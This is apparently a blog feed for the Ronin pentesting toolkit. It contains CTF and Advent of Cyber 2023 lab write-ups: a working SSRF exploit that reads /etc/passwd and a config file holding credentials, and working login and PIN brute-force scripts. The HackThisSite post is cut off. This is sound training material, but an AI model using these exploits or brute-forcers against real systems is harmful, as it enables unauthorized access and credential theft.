Ronin Developer Bloghttp://ronin-rb.github.io/images/favicon.icohttp://ronin-rb.github.io/images/logo.svg2024-03-16T01:30:00+00:00http://ronin-rb.github.io/blog/Stop wasting your time on annoying CTF challenges (and just use Ronin)!2024-03-15 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2024/03/15/stop-wasting-your-time-on-annoying-ctf-challenges.html<p>The other day I spotted someone in <a href="https://nahamsec.com/">nahamsec</a>’s Discord server struggling with
a CTF challenge that involved decoding an encrypted string. They had already
tried <a href="https://cyberchef.org/">CyberChef</a>, but no luck. Other users encouraged them to
“try harder”.</p>
<p>They were trying to decrypt the following string:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pai1nYPe3tLR1IOH1YKH14XegtCDgtSH1oKAgNGF34eH19bSmw==
</code></pre></div></div>
<p>Clearly it looks base64 encoded, but if you base64 decode the string you get
binary data. The user said that the challenge hinted that the string was
XOR encrypted and the plain-text was of the form <code class="language-plaintext highlighter-rouge">CNS{md5hash}</code>.</p>
<p>Using the <code class="language-plaintext highlighter-rouge">ronin irb</code> console I was able to easily solve this in <em>one line of
Ruby</em>:</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">Chars</span><span class="p">.</span><span class="nf">ascii</span><span class="p">.</span><span class="nf">map</span> <span class="p">{</span> <span class="o">|</span><span class="n">key</span><span class="o">|</span> <span class="s2">"pai1nYPe3tLR1IOH1YKH14XegtCDgtSH1oKAgNGF34eH19bSmw=="</span><span class="p">.</span>
<span class="nf">base64_decode</span><span class="p">.</span><span class="nf">xor</span><span class="p">(</span><span class="n">key</span><span class="p">)</span> <span class="p">}.</span><span class="nf">find</span> <span class="p">{</span> <span class="o">|</span><span class="n">text</span><span class="o">|</span> <span class="n">text</span><span class="p">.</span><span class="nf">start_with?</span><span class="p">(</span><span class="s1">'CNS{'</span><span class="p">)</span> <span class="p">}</span>
</code></pre></div></div>
<p>Starting with the assumption that the CTF challenge probably used an XOR
encryption key of a single ASCII character, all we have to do is bruteforce
decrypt the base64 decoded string using every possible character in the ASCII
character set, then find the decrypted string that starts with <code class="language-plaintext highlighter-rouge">CNS{</code>.</p>
<p>Running the above code gives us the answer:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CNS{e88472ea3da1c8d6ed2a0dff7c9aa104}
</code></pre></div></div>
<p>That’s it!</p>
<p>You don’t have to “try harder”, just use <a href="/install/">Ronin</a>!</p>
Make your New Year's Resolution for 2024 to try Ronin2024-01-01 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2024/01/01/make-your-new-years-resolution-for-2024-to-learn-ronin.html<p>The other day I noticed someone in a popular InfoSec certification Discord
server asking if anyone else had used <a href="/">Ronin</a>. They said that Ronin looked
interesting, but were unsure whether they should take the risk to learn a new
tool.</p>
<p>Each new year people make New Year’s Resolutions to try new things or to better
themselves. For 2024 why not make your New Year’s Resolution to try Ronin?
Browse the <a href="https://github.com/ronin-rb">GitHub organization</a> and checkout the various
repositories. Read the example commands and code in their <code class="language-plaintext highlighter-rouge">README</code>s.
Try <a href="/install/">installing Ronin</a> using the
<a href="https://raw.githubusercontent.com/ronin-rb/scripts/main/ronin-install.sh">automatic installer script</a>. Try running some of the
<code class="language-plaintext highlighter-rouge">ronin</code> commands. Use the <code class="language-plaintext highlighter-rouge">ronin tips</code> command to learn about Ruby’s commands
and Ruby scripting APIs. Use <code class="language-plaintext highlighter-rouge">--help</code> to open a command’s man page and see it’s
options. Don’t want to install Ronin directly on to your system, there’s also
<a href="https://hub.docker.com/r/roninrb/ronin">Docker images</a> you can jump into. Now has never been a better time to try
Ronin.</p>
<p>Even if you end up not liking Ronin, you can always uninstall it and forget
about it. So why not give Ronin a shot in 2024? You don’t have anything to lose.</p>
ronin-db 0.1.3, ronin-exploits 1.0.4, and ronin-support 1.0.5 released!2023-12-27 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/12/27/ronin-db-0-1-3-ronin-exploits-1-0-4-and-ronin-support-1-0-5-released.html<p><a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> <a href="https://github.com/ronin-rb/ronin-db/releases/tag/v0.1.3">0.1.3</a>,
<a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> <a href="https://github.com/ronin-rb/ronin-exploits/releases/tag/v1.0.4">1.0.4</a>, and
<a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> <a href="https://github.com/ronin-rb/ronin-support/releases/tag/v1.0.5">1.0.5</a>
have been released. These new releases are patch releases and contain minor
bug fixes and improvements to the documentation. Most notably <a href="https://github.com/ronin-rb/ronin-db/releases/tag/v0.1.3">ronin-db-0.1.3</a>
contains a fix for a bug in the <code class="language-plaintext highlighter-rouge">ronin-db add</code> command when ran for the first
time, which a new user (<code class="language-plaintext highlighter-rouge">@shellspawn</code>) had discovered. Also,
<a href="https://github.com/ronin-rb/ronin-support/releases/tag/v1.0.5">ronin-support-1.0.5</a> fixes a Ruby 3.3.0 specific bug, so it should be safe to
use Ronin with the brand new <a href="https://www.ruby-lang.org/en/news/2023/12/25/ruby-3-3-0-released/">Ruby 3.3.0</a> now.</p>
<p>To update <code class="language-plaintext highlighter-rouge">ronin</code>, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>gem update ronin
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
Solving Advent of Cyber 2023 Day 22 with ronin-exploits2023-12-23 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/12/23/solving-advent-of-cyber-2023-day-22-with-ronin-exploits.html<p>This year I decided to try using Ronin to solve the [Advent of Cyber 2023]
challenges. Let’s see how far I can get.</p>
<p>We made it to Day 22 of Advent of Cyber 2023. This challenge involves exploiting
a super simple <a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery">Server Side Request Forgery (SSRF)</a> vulnerability.
While most SSRF vulnerabilities allow sending HTTP requests to internal
web servers, the instructions hint that you can also send <code class="language-plaintext highlighter-rouge">file://</code> URIs and
request local files. You could solve this challenge only using <code class="language-plaintext highlighter-rouge">curl</code>,
but I decided to use <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> to write a SSRF exploit that requests a
local file.</p>
<p>First we will use the <code class="language-plaintext highlighter-rouge">ronin-exploits new</code> command to generate a new web
exploit. We will also enable the <a href="https://ronin-rb.dev/docs/ronin-exploits/Ronin/Exploits/Mixins/Loot.html">Loot mixin</a>
to store the requested files.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>ronin-exploits new <span class="nt">--type</span> web <span class="nt">--loot</span> jingle_bells_ssrf.rb
erb exploit.rb.erb jingle_bells_ssrf.rb
<span class="nb">chmod </span>jingle_bells_ssrf.rb
</code></pre></div></div>
<p>Testing the vulnerable <code class="language-plaintext highlighter-rouge">/getClientData.php</code> HTTP end-point shows that local
files requested with <code class="language-plaintext highlighter-rouge">file://</code> are returned in the HTTP response body.
Requesting a file that does not exist on the system will result in a HTTP 200
response, but with an empty response body. To send the HTTP request, we will use
the <a href="https://ronin-rb.dev/docs/ronin-exploits/Ronin/Exploits/Mixins/HTTP.html#http_get-instance_method">http_get</a> helper method, which accepts a path and additional query
params, sends a HTTP <code class="language-plaintext highlighter-rouge">GET</code> request, and returns the HTTP response object.
We will also need to define a <code class="language-plaintext highlighter-rouge">file</code> param for the local file we wish to
request via <code class="language-plaintext highlighter-rouge">file://</code> SSRF. Since this is a super simple SSRF exploit,
we will only need to fill in the <code class="language-plaintext highlighter-rouge">launch</code> method.</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env -S ronin-exploits run -f</span>
<span class="nb">require</span> <span class="s1">'ronin/exploits/web'</span>
<span class="nb">require</span> <span class="s1">'ronin/exploits/mixins/loot'</span>
<span class="k">module</span> <span class="nn">Ronin</span>
<span class="k">module</span> <span class="nn">Exploits</span>
<span class="k">class</span> <span class="nc">JingleBellsSSRF</span> <span class="o"><</span> <span class="no">Web</span>
<span class="kp">include</span> <span class="no">Mixins</span><span class="o">::</span><span class="no">Loot</span>
<span class="n">register</span> <span class="s1">'jingle_bells_ssrf'</span>
<span class="n">quality</span> <span class="ss">:poc</span>
<span class="n">release_date</span> <span class="s1">'2023-12-22'</span>
<span class="n">author</span> <span class="s2">"Postmodern"</span><span class="p">,</span> <span class="ss">email: </span><span class="s2">"postmodern.mod3@gmail.com"</span>
<span class="n">summary</span> <span class="s2">"Advent of Cyber 2023 Day 22"</span>
<span class="n">description</span> <span class="o"><<~</span><span class="no">DESC</span><span class="sh">
A Basic SSRF exploit for Advent of Cyber 2023 Day 22 aka
"Jingle Your SSRF Bells: A Merry Command & Control Hackventure".
</span><span class="no"> DESC</span>
<span class="n">references</span> <span class="p">[</span>
<span class="s2">"https://tryhackme.com/room/adventofcyber2023"</span>
<span class="p">]</span>
<span class="n">param</span> <span class="ss">:file</span><span class="p">,</span> <span class="ss">required: </span><span class="kp">true</span><span class="p">,</span>
<span class="ss">desc: </span><span class="s1">'The path of the local file to request'</span>
<span class="k">def</span> <span class="nf">launch</span>
<span class="n">file_uri</span> <span class="o">=</span> <span class="s2">"file://</span><span class="si">#{</span><span class="n">params</span><span class="p">[</span><span class="ss">:file</span><span class="p">]</span><span class="si">}</span><span class="s2">"</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">http_get</span><span class="p">(</span><span class="s1">'/getClientData.php'</span><span class="p">,</span> <span class="ss">query_params: </span><span class="p">{</span><span class="ss">url: </span><span class="n">file_uri</span><span class="p">})</span>
<span class="k">if</span> <span class="n">response</span><span class="p">.</span><span class="nf">code</span> <span class="o">==</span> <span class="s1">'200'</span> <span class="o">&&</span> <span class="o">!</span><span class="n">response</span><span class="p">.</span><span class="nf">body</span><span class="p">.</span><span class="nf">empty?</span>
<span class="n">print_success</span> <span class="s2">"Got the file!"</span>
<span class="n">loot</span><span class="p">.</span><span class="nf">add</span><span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="ss">:file</span><span class="p">],</span><span class="n">response</span><span class="p">.</span><span class="nf">body</span><span class="p">)</span>
<span class="k">else</span>
<span class="nb">fail</span><span class="p">(</span><span class="s2">"Failed to request the file: </span><span class="si">#{</span><span class="n">params</span><span class="p">[</span><span class="ss">:file</span><span class="p">]</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
</code></pre></div></div>
<p>Now that our exploit is written, let’s run it!</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./jingle_bells_ssrf.rb -p base_url=http://10.10.108.219 -p file=/etc/passwd
>>> Running exploit jingle_bells_ssrf ...
[+] Got the file!
>>> Exploit found the following loot:
/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false
</code></pre></div></div>
<p>We have successfully exploited the SSRF vulnerability and achieved local file
read access. The challenge instructions hints that we should try requesting
<code class="language-plaintext highlighter-rouge">config.php</code> from the <code class="language-plaintext highlighter-rouge">/var/www/html/</code> directory, which may contain the C2
panel’s credentials.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./jingle_bells_ssrf.rb -p base_url=http://10.10.108.219 -p file=/var/www/html/config.php
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>> Running exploit jingle_bells_ssrf ...
[+] Got the file!
>>> Exploit found the following loot:
/var/www/html/config.php:
<?php
$username = "mcgreedy";
$password = "mcgreedy!@#$%";
?>
</code></pre></div></div>
<p>Jack pot!</p>
<p>As you can see, <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> makes it easy to write <a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery">SSRF</a> exploits and
exfiltrate files.</p>
Solving Advent of Cyber 2023 Day 4 using Ronin2023-12-04 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/12/04/solving-advent-of-cyber-day-4-using-ronin.html<p>This year I decided to try using Ronin to solve the <a href="https://tryhackme.com/room/adventofcyber2023">Advent of Cyber 2023</a>
challenges. Let’s see how far I can get.</p>
<p>The Day 4 challenge is also a bruteforcing challenge like Day 3, but this time
we have to bruteforce the username and password for a login form. The
instructions for the challenge recommends using <a href="https://github.com/digininja/CeWL#readme">CeWL</a> to spider the website
and build a custom words, and then use <a href="https://github.com/xmendez/wfuzz#readme">wfuzz</a> to bruteforce the login form
until we get a successful login response. Instead of using <a href="https://github.com/digininja/CeWL#readme">CeWL</a>, we will
use <a href="https://github.com/ronin-rb/ronin-web#readme">ronin-web</a>’s brand new <code class="language-plaintext highlighter-rouge">wordlist</code> command to spider the website and build
the custom wordlist. The <code class="language-plaintext highlighter-rouge">ronin-web wordlist</code> command leverages the
battle-tested <a href="https://github.com/postmodern/spidr#readme">spidr</a> library and has many more options than <a href="https://github.com/digininja/CeWL#readme">CeWL</a>.</p>
<p>First we will need to use <code class="language-plaintext highlighter-rouge">ronin-web wordlist</code> to spider the website and create
a custom wordlist of possible usernames. The instructions for the challenge
hint that we should generate a wordlist containing lowercase usernames.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ronin-web wordlist <span class="nt">--site</span> http://10.10.223.131 <span class="nt">-o</span> usernames.txt <span class="nt">--normalize-case</span>
</code></pre></div></div>
<p>Next we will need to spider the website again and generate a custom wordlist of
possible passwords. The instructions for the challenge hint that we will want
to allow digits and whole numbers in our password wordlist.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ronin-web wordlist <span class="nt">--site</span> http://10.10.223.131 <span class="nt">--digits</span> <span class="nt">--numbers</span> <span class="nt">-o</span> passwords.txt
</code></pre></div></div>
<p>Now that we have our two custom wordlists, we will write a bruteforcing Ruby
script that will send every combination of username and password, until we get a
successful login response. First we will need to determine what an unsuccessful
login attempt HTTP response looks like, so our bruteforcer Ruby script can
ignore those and keep bruteforcing. Attempting to login with the username <code class="language-plaintext highlighter-rouge">foo</code>
and the password <code class="language-plaintext highlighter-rouge">bar</code>, and checking the Network tab in Chrome DevTools, we see
a 200 OK response. Hmm that doesn’t seem right. The same login page is returned,
but with the text <code class="language-plaintext highlighter-rouge">Please enter the correct credentials</code>. If a HTTP response
contains the text <code class="language-plaintext highlighter-rouge">Please enter the correct credentials</code> than we know the
username and password did not work and to try the next username and password.</p>
<p>Another problem is that it takes a while for a HTTP response to be returned for
a login attempt. This means that a single threaded bruterforcer script would
take too long and the machine would likely timeout or expire before we have
found the correct username and password. We need to pull out Ruby’s secret
weapon for high-performance I/O, the <a href="https://socketry.github.io/async/guides/getting-started/index.html">async gems</a>. The [async gems]
allow writing asynchronous I/O code that runs in Ruby Fibers, which are
lighter weight than native Threads. When one Ruby Fiber blocks waiting
for data to be received, Ruby can switch to another Fiber; this also means
we don’t have to deal with “callback hell”. Using the <a href="https://socketry.github.io/async/guides/getting-started/index.html">async gems</a>
we can easily create a pool of worker tasks which consume username/password
combinations from a producer task, sends the HTTP requests, waits for a
response, checks the response and exits if one of the
username/password combinations works.</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">require</span> <span class="s1">'ronin/support'</span>
<span class="nb">require</span> <span class="s1">'wordlist'</span>
<span class="nb">require</span> <span class="s1">'async'</span>
<span class="nb">require</span> <span class="s1">'async/queue'</span>
<span class="nb">require</span> <span class="s1">'async/io'</span>
<span class="kp">include</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Support</span>
<span class="c1"># worker pool size</span>
<span class="no">WORKERS</span> <span class="o">=</span> <span class="mi">100</span>
<span class="n">usernames</span> <span class="o">=</span> <span class="no">Wordlist</span><span class="p">.</span><span class="nf">open</span><span class="p">(</span><span class="s1">'usernames.txt'</span><span class="p">)</span>
<span class="n">passwords</span> <span class="o">=</span> <span class="no">Wordlist</span><span class="p">.</span><span class="nf">open</span><span class="p">(</span><span class="s1">'passwords.txt'</span><span class="p">)</span>
<span class="n">ip</span> <span class="o">=</span> <span class="no">ARGV</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># the work queue</span>
<span class="n">credentials</span> <span class="o">=</span> <span class="no">Async</span><span class="o">::</span><span class="no">LimitedQueue</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="no">WORKERS</span><span class="p">)</span>
<span class="no">Async</span> <span class="k">do</span> <span class="o">|</span><span class="n">task</span><span class="o">|</span>
<span class="c1"># producer task</span>
<span class="n">task</span><span class="p">.</span><span class="nf">async</span> <span class="k">do</span>
<span class="n">usernames</span><span class="p">.</span><span class="nf">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">username</span><span class="o">|</span>
<span class="n">passwords</span><span class="p">.</span><span class="nf">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">password</span><span class="o">|</span>
<span class="n">credentials</span><span class="p">.</span><span class="nf">enqueue</span><span class="p">([</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">])</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="c1"># send the stop values to the workers</span>
<span class="no">WORKERS</span><span class="p">.</span><span class="nf">times</span> <span class="p">{</span> <span class="n">credentials</span><span class="p">.</span><span class="nf">enqueue</span><span class="p">(</span><span class="kp">nil</span><span class="p">)</span> <span class="p">}</span>
<span class="k">end</span>
<span class="c1"># initialize the worker pool</span>
<span class="no">WORKERS</span><span class="p">.</span><span class="nf">times</span> <span class="k">do</span>
<span class="c1"># consumer task</span>
<span class="n">task</span><span class="p">.</span><span class="nf">async</span> <span class="k">do</span>
<span class="n">http</span> <span class="o">=</span> <span class="n">http_connect</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span><span class="mi">80</span><span class="p">)</span>
<span class="c1"># send the initial request to obtain the session cookie</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s1">'/login.php'</span><span class="p">)</span>
<span class="n">session_cookie</span> <span class="o">=</span> <span class="n">response</span><span class="p">[</span><span class="s1">'Set-Cookie'</span><span class="p">]</span>
<span class="k">while</span> <span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span> <span class="o">=</span> <span class="n">credentials</span><span class="p">.</span><span class="nf">dequeue</span><span class="p">)</span>
<span class="n">print_info</span> <span class="s2">"Trying </span><span class="si">#{</span><span class="n">username</span><span class="si">}</span><span class="s2"> : </span><span class="si">#{</span><span class="n">password</span><span class="si">}</span><span class="s2"> ..."</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="s1">'/login.php'</span><span class="p">,</span> <span class="ss">form_data: </span><span class="p">{</span>
<span class="ss">username: </span><span class="n">username</span><span class="p">,</span>
<span class="ss">password: </span><span class="n">password</span>
<span class="p">},</span>
<span class="ss">cookie: </span><span class="n">session_cookie</span><span class="p">)</span>
<span class="k">if</span> <span class="n">response</span><span class="p">.</span><span class="nf">body</span><span class="p">.</span><span class="nf">include?</span><span class="p">(</span><span class="s1">'Please enter the correct credentials'</span><span class="p">)</span>
<span class="c1"># login failed, keep trying ...</span>
<span class="k">else</span>
<span class="n">print_success</span> <span class="s2">"Jack Pot! </span><span class="si">#{</span><span class="n">username</span><span class="si">}</span><span class="s2"> : </span><span class="si">#{</span><span class="n">password</span><span class="si">}</span><span class="s2">"</span>
<span class="nb">exit</span> <span class="mi">0</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="n">print_failure</span> <span class="s2">"No usernames/passwords worked :("</span>
<span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
</code></pre></div></div>
<p>Now to run the bruteforcing Ruby script against the target machine IP address.
We will add the <code class="language-plaintext highlighter-rouge">--jit</code> option to speed up our Ruby script as much as possible.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>ruby <span class="nt">--jit</span> bruteforce.rb 10.10.223.131
</code></pre></div></div>
<p>Now we should see username and password combinations fly past as the
bruteforcing Ruby script hammers the target machine. Eventually you should
find the correct username and password combination:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
[*] Trying security : meticulous ...
[*] Trying security : attention ...
[*] Trying security : detail ...
[+] Jack Pot! isaias : Happiness
</code></pre></div></div>
<p>As you can see, Ronin provides you with powerful commands <em>and</em> libraries that
can give you an edge over other pentesting tools.</p>
Solving Advent of Cyber 2023 Day 3 using Ronin2023-12-03 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/12/03/solving-advent-of-cyber-day-3-using-ronin.html<p>This year I decided to try using Ronin to solve the <a href="https://tryhackme.com/room/adventofcyber2023">Advent of Cyber 2023</a>
challenges. Let’s see how far I can get.</p>
<p>The Day 3 challenge involves a basic HTTP form which accepts a three digit PIN
code. The PIN code can contain numeric or uppercase hexadecimal numbers.
The instructions for the challenge recommends using the <a href="https://www.kali.org/tools/crunch/">crunch</a> utility to
generate a wordlist file containing every three character combination of
uppercase hexadecimal characters and then use <a href="https://www.kali.org/tools/hydra/">hydra</a> to bruteforce the login
form. Instead, we’re going to do all of that in a single Ruby script using
Ronin and it’s powerful libraries.</p>
<p>First, we will test the HTTP form by intentionally entering an incorrect PIN
code and seeing what the response is. In the Network tab of Chrome DevTools,
we can see a failed login attempt results in a HTTP 302 response with a
<code class="language-plaintext highlighter-rouge">Location</code> header of <code class="language-plaintext highlighter-rouge">error.php</code>. Since we don’t know what a valid login
HTTP response looks like, we will have to assume anything that is not a
HTTP 302 redirect to <code class="language-plaintext highlighter-rouge">error.php</code> can be considered a successful login.</p>
<p>Next we will write a bruteforcing Ruby script which will send every possible
three character combination of numbers and uppercase hexadecimal characters.
To do that we will use the <a href="https://github.com/postmodern/chars.rb#readme">chars</a> library, which provides a
<a href="https://rubydoc.info/gems/chars/Chars">Chars::UPPERCASE_HEXADECIMAL</a> constant containing the characters <code class="language-plaintext highlighter-rouge">0</code> - <code class="language-plaintext highlighter-rouge">9</code> and
<code class="language-plaintext highlighter-rouge">A</code> - <code class="language-plaintext highlighter-rouge">F</code>. Then we will call the <a href="https://rubydoc.info/gems/chars/Chars/CharSet#strings_of_length-instance_method">Chars::CharSet#strings_of_length</a> method to
generate every three character combination of uppercase hexadecimal characters.
Then we will use <a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> to establish a persistent HTTP connection and
send login requestions until a non-HTTP 302 redirect response is returned.</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">require</span> <span class="s1">'ronin/support'</span>
<span class="nb">require</span> <span class="s1">'chars'</span>
<span class="kp">include</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Support</span>
<span class="n">wordlist</span> <span class="o">=</span> <span class="no">Chars</span><span class="o">::</span><span class="no">UPPERCASE_HEXADECIMAL</span><span class="p">.</span><span class="nf">strings_of_length</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span>
<span class="n">ip</span> <span class="o">=</span> <span class="no">ARGV</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="n">http</span> <span class="o">=</span> <span class="n">http_connect</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span><span class="mi">8000</span><span class="p">)</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s1">'/pin.php'</span><span class="p">)</span>
<span class="n">session_cookie</span> <span class="o">=</span> <span class="n">response</span><span class="p">[</span><span class="s1">'Set-Cookie'</span><span class="p">]</span>
<span class="n">wordlist</span><span class="p">.</span><span class="nf">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">pin</span><span class="o">|</span>
<span class="n">print_info</span> <span class="s2">"Trying </span><span class="si">#{</span><span class="n">pin</span><span class="si">}</span><span class="s2"> ..."</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="s1">'/login.php'</span><span class="p">,</span> <span class="ss">form_data: </span><span class="p">{</span><span class="ss">pin: </span><span class="n">pin</span><span class="p">},</span>
<span class="ss">cookie: </span><span class="n">session_cookie</span><span class="p">)</span>
<span class="k">if</span> <span class="n">response</span><span class="p">.</span><span class="nf">code</span> <span class="o">==</span> <span class="s1">'302'</span> <span class="o">&&</span> <span class="n">response</span><span class="p">[</span><span class="s1">'Location'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'error.php'</span>
<span class="c1"># login failed, keep trying ...</span>
<span class="k">else</span>
<span class="n">print_success</span> <span class="s2">"Jack Pot! </span><span class="si">#{</span><span class="n">pin</span><span class="si">}</span><span class="s2">"</span>
<span class="nb">exit</span> <span class="mi">0</span>
<span class="k">end</span>
<span class="k">end</span>
</code></pre></div></div>
<p>Now to run the bruteforcing Ruby script against the target machine IP address.
We will add the <code class="language-plaintext highlighter-rouge">--jit</code> option to try to speed up our Ruby script as much as
possible.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>ruby <span class="nt">--jit</span> bruteforce.rb 10.10.185.45
</code></pre></div></div>
<p>and eventually we will hit the correct PIN code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
[*] Trying 6F2 ...
[*] Trying 6F3 ...
[*] Trying 6F4 ...
[*] Trying 6F5 ...
[+] Jack Pot! 6F5
</code></pre></div></div>
<p>As you can see, Ronin provides you with powerful libraries that can make solving
CTF challenges easy and fun.</p>
Solving HackThisSite Programming Level 11 with Ronin2023-11-26 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/11/26/solving-hackthissite-programming-level-11-with-ronin.html<p><a href="https://www.hackthissite.org/missions/prog/11/">HackThisSite Programming Level 11</a> involves decoding a string of randomly
generated numbers using another randomly generated <code class="language-plaintext highlighter-rouge">Shift</code> number.
This <a href="https://hackthissite.org">HackThisSite</a> level is a bit more difficult than the first one. Unlike the
other levels, it has a five second timer, which makes it almost impossible to
copy/paste the randomly generated numbers into a script and then copy/paste the
answer back into the form.</p>
<p>Now we could do something complex like use the new <a href="https://github.com/ronin-rb/ronin-web-browser#readme">ronin-web-browser</a> library
to control an instance of Chrome, login to <a href="https://hackthissite.org">HackThisSite</a>, navigate to the
challenge webpage, scrape the randomly generated numbers, compute the answer,
enter the answer into the form, and click the submit button. Luckily for us
<a href="https://hackthissite.org">HackThisSite</a> is designed like a classical PHP webapp. There’s no CSRF tokens,
no JWT, no client-side JavaScript rendering, etc, just a session ID set in the
session cookie. All we have to do is send the same HTTP requests that the
browser would send.</p>
<p>First, We will need to extract the session ID from the cookie in the browser.
To extract the session ID simply login to <a href="https://hackthissite.org">HackThisSite</a> in a web browser,
open the JavaScript console and evaluate <code class="language-plaintext highlighter-rouge">document.cookie</code>.
The session ID will be the random characters after <code class="language-plaintext highlighter-rouge">HackThisSite=</code>.</p>
